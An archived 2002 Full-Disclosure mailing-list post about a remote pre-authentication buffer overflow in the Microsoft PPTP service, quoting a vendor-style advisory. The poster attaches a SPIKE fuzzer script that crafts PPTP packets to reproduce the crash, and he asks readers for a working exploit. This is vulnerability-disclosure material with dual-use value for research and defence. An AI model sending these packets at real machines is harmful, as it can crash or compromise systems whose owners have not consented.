[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-Disclosure] Re: Microsoft PPTP Server and Client remote vulnerability
From: Dave Aitel <dave () immunitysec ! com>
Date: 2002-09-26 20:13:21
[Download RAW message or body]
[Attachment #2 (multipart/mixed)]
SPIKE 2.6.2 or above should be able to handle this .spk file which will
replicate the vulnerability. Someone send me a working sploit in
exchange, please. I'm too lazy to muck with it. (Or I have other
exploits to muck with, one or the other :>)
-dave
P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy)
at http://www.immunitysec.com/spike.html, if you haven't already.
P.P.S. This script is released under the terms of the GNU GPL v 2.0.
On Thu, 2002-09-26 at 05:43, sh@phion.com wrote:
> phion Security Advisory 26/09/2002
>
> Microsoft PPTP Server and Client remote vulnerability
>
>
> Summary
> -----------------------------
>
> The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
> remotely exploitable pre-authentication bufferoverflow.
>
>
> Affected Systems
> -----------------------------
>
> Microsoft Windows 2000 and XP running either a PPTP Server or Client.
>
>
> Impact
> -----------------------------
>
> With a specially crafted PPTP packet it is possible to overwrite kernel
> memory.
>
> A DoS resulting in a lockup of the machine has been verified on
> Windows 2000 SP3 and Windows XP.
>
> A remote compromise should be possible deploying proper shellcode,
> as we were able to fill EDI and EDX with our data.
>
> Clients are vulnerable too, because the Service always listens on port
> 1723 on any interface of the machine, this might be of special concern
> to DSL users which use PPTP to connect to their modem.
>
>
> Solution
> -----------------------------
>
> As a temporary solution for the Client issue, one might firewall the PPTP
> port in the Internet Connection Firewall for Windows XP.
>
> We dont know of any solution for Windows 2000 and Windows XP PPTP servers.
>
> The vendor has been informed.
>
>
> Acknowledgements
> -----------------------------
>
> The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
> on behalf of phion Information Technologies.
>
>
> Contact Information
> -----------------------------
>
> phion Information Technologies can be reached via:
> office@phion.com / http://www.phion.com
>
> Stephan Hoffmann can be reached via:
> sh@phion.com
>
> Thomas Unterleitner can be reached via:
> t.unterleitner@phion.com
>
> References
> -----------------------------
>
> [1] phion Information Technologies
> http://www.phion.com/
>
> Exploit
> -----------------------------
>
> phion Information Technologies will not provide an exploit for this issue.
>
>
> Disclaimer
> -----------------------------
>
> This advisory does not claim to be complete or to be usable for any
> purpose.
>
> This advisory is free for open distribution in unmodified form.
>
> Articles or Publications that are based on information from this advisory
> have to include link [1].
>
>
["pptp.spk" (pptp.spk)]
//start control request
s_block_start("PPTP");
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 - control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 1 - start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);
//hostname
s_string_variable("A");
s_binary_repeat("00",63);
//vendor
s_string_variable("A");
s_binary_repeat("00",63);
s_block_end("PPTP");
///
/// NEXT PACKET
///
///
//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 - control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 1 - outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");
//call id
s_binary("0000");
//serial number
s_binary("0000");
//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//recieve window size
s_binary("0003");
//processing delay
s_binary("0000");
s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");
["signature.asc" (application/pgp-signature)]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic